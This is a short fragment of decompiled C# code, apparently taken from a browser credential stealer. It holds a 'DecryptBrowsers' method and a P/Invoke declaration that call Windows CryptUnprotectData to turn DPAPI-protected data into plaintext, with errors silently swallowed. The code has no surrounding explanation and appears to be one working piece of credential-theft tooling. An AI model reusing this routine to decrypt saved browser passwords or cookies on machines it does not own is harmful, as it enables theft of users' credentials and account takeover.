// Token: 0x06000045 RID: 69 RVA: 0x00006B9C File Offset: 0x00004D9C public static byte[] DecryptBrowsers(byte[] cipherTextBytes, byte[] entropyBytes = null) { browserstest.DataBlob dataBlob = default(browserstest.DataBlob); browserstest.DataBlob dataBlob2 = default(browserstest.DataBlob); browserstest.DataBlob dataBlob3 = default(browserstest.DataBlob); browserstest.CryptprotectPromptstruct cryptprotectPromptstruct = new browserstest.CryptprotectPromptstruct { cbSize = Marshal.SizeOf(typeof(browserstest.CryptprotectPromptstruct)), dwPromptFlags = 0, hwndApp = IntPtr.Zero, szPrompt = null }; string empty = string.Empty; try { try { bool flag = cipherTextBytes == null; if (flag) { cipherTextBytes = new byte[0]; } dataBlob2.pbData = Marshal.AllocHGlobal(cipherTextBytes.Length); dataBlob2.cbData = cipherTextBytes.Length; Marshal.Copy(cipherTextBytes, 0, dataBlob2.pbData, cipherTextBytes.Length); } catch { } try { bool flag2 = entropyBytes == null; if (flag2) { entropyBytes = new byte[0]; } dataBlob3.pbData = Marshal.AllocHGlobal(entropyBytes.Length); dataBlob3.cbData = entropyBytes.Length; Marshal.Copy(entropyBytes, 0, dataBlob3.pbData, entropyBytes.Length); } catch { } browserstest.CryptUnprotectData(ref dataBlob2, ref empty, ref dataBlob3, IntPtr.Zero, ref cryptprotectPromptstruct, 1, ref dataBlob); byte[] array = new byte[dataBlob.cbData]; Marshal.Copy(dataBlob.pbData, array, 0, dataBlob.cbData); return(array); } catch { } finally { bool flag3 = dataBlob.pbData != IntPtr.Zero; if (flag3) { Marshal.FreeHGlobal(dataBlob.pbData); } bool flag4 = dataBlob2.pbData != IntPtr.Zero; if (flag4) { Marshal.FreeHGlobal(dataBlob2.pbData); } bool flag5 = dataBlob3.pbData != IntPtr.Zero; if (flag5) { Marshal.FreeHGlobal(dataBlob3.pbData); } } return(new byte[0]); }
private static extern bool CryptUnprotectData(ref browserstest.DataBlob pCipherText, ref string pszDescription, ref browserstest.DataBlob pEntropy, IntPtr pReserved, ref browserstest.CryptprotectPromptstruct pPrompt, int dwFlags, ref browserstest.DataBlob pPlainText);